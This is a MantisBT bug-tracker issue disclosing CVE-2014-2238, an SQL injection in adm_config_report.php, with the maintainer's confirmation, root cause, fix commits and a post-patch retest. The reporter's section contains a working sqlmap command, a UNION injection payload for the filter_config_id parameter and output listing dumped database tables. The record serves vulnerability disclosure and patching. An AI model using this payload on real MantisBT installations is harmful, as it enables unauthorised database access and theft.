View Issue Details

IDProjectCategoryView StatusLast Update
0017055mantisbtsecuritypublic2014-03-03 14:24
ReporterHauntITAssigned Todregad 
PriorityimmediateSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Product Version1.2.13 
Target Version1.2.17Fixed in Version1.2.17 
Summary0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
Description

Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in manage configuration page.

Additional Information

k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php"; --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:

Place: POST
Parameter: filter_config_id
Type: UNION query
Title: Generic UNION query (11) - 6 columns
Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter

[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)

TagsNo tags attached.

Relationships

Activities

dregad

dregad

2014-02-28 12:11

developer   ~0039585

Last edited: 2014-02-28 12:12

View 2 revisions

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de

dregad

dregad

2014-02-28 12:33

developer   ~0039586

sqlmap test after patching:

[*] starting at 18:32:39

[18:32:39] [INFO] testing connection to the target URL
[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 
[18:32:41] [INFO] skipping POST parameter 'save'
[18:32:41] [INFO] skipping POST parameter 'filter_user_id'
[18:32:41] [INFO] skipping POST parameter 'filter_project_id'
[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic
[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic
[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic
[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be injectable
[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'
[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:32:44] [INFO] testing 'MySQL inline queries'
[18:32:44] [WARNING] reflective value(s) found and filtering out
[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable
[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'
[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 18:32:59
dregad

dregad

2014-02-28 15:03

developer   ~0039587

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241

Related Changesets

MantisBT: master-1.2.x a608f2d0

2014-02-28 12:23:14

dregad

Details Diff
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php Diff File

MantisBT: master e8bdd248

2014-02-28 12:23:14

dregad

Details Diff
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php Diff File

Issue History

Date Modified Username Field Change
2014-02-28 11:00 dregad New Issue
2014-02-28 11:01 dregad Reporter dregad => HauntIT
2014-02-28 12:11 dregad Note Added: 0039585
2014-02-28 12:11 dregad Status new => confirmed
2014-02-28 12:11 dregad Product Version 1.2.16 => 1.2.13
2014-02-28 12:12 dregad Note Edited: 0039585 View Revisions
2014-02-28 12:31 dregad Changeset attached => MantisBT master-1.2.x a608f2d0
2014-02-28 12:31 dregad Assigned To => dregad
2014-02-28 12:31 dregad Status confirmed => resolved
2014-02-28 12:31 dregad Resolution open => fixed
2014-02-28 12:31 dregad Fixed in Version => 1.2.17
2014-02-28 12:31 dregad Changeset attached => MantisBT master e8bdd248
2014-02-28 12:33 dregad Note Added: 0039586
2014-02-28 12:35 dregad View Status private => public
2014-02-28 15:03 dregad Note Added: 0039587
2014-02-28 15:35 dregad Summary SQL injection vulnerability in adm_config_report.php => CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
2014-03-03 14:24 dregad Status resolved => closed